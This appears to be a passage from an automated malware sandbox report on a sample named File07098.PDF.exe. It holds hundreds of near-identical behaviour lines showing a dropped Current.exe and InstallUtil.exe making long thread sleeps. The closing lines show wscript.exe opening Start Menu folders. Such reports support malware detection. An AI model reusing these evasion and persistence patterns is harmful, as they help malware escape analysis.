                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -99312s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -99203s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -99093s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -98981s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -98721s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -98219s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -98031s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -97922s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -97812s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -97703s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -97594s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -97479s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -97359s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -97250s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -97140s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -97031s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -96922s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -96812s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -96703s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -96594s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -96484s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -96375s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -96265s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -96151s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -96011s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7060Thread sleep count: 8627 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7060Thread sleep count: 1227 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -599875s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -599765s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -599656s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -599547s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -599437s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -599328s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -599219s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -599094s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -598984s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -598872s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -598765s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -598656s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -598547s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -598437s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -598328s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -598218s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -598109s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -598000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -597890s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -597781s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -597672s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -597562s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -597453s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -597343s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -597234s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -597125s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -597015s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -596906s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -596797s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -596687s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -596578s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -596466s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -596359s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -596250s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -596140s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -596031s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -595922s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -595812s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -595703s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -595593s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -595484s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -595375s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -595265s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -595156s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -595047s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -594937s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -594828s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -594718s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7064Thread sleep time: -594609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 99891Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 99766Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 99656Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 99547Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 99438Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 99313Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 99188Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 99063Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 98909Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 98740Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 98568Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 98391Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 98190Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 98053Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 97938Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 97828Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 97719Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 97594Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 97484Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 97375Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 97266Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 97156Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 97047Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 96938Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 96813Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 96703Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 96591Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 96484Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 96375Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 96266Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 96141Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 96031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599014Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597702Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595952Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595839Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595731Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595606Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595391Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594515Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 99874Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 99750Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 99640Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 99531Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 99422Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 99312Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 99203Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 99093Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 98981Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 98721Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 98219Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 98031Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 97922Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 97812Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 97703Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 97594Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 97479Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 97359Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 97250Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 97140Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 97031Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 96922Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 96812Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 96703Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 96594Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 96484Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 96375Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 96265Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 96151Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 96011Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598872Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598218Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596466Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594609Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
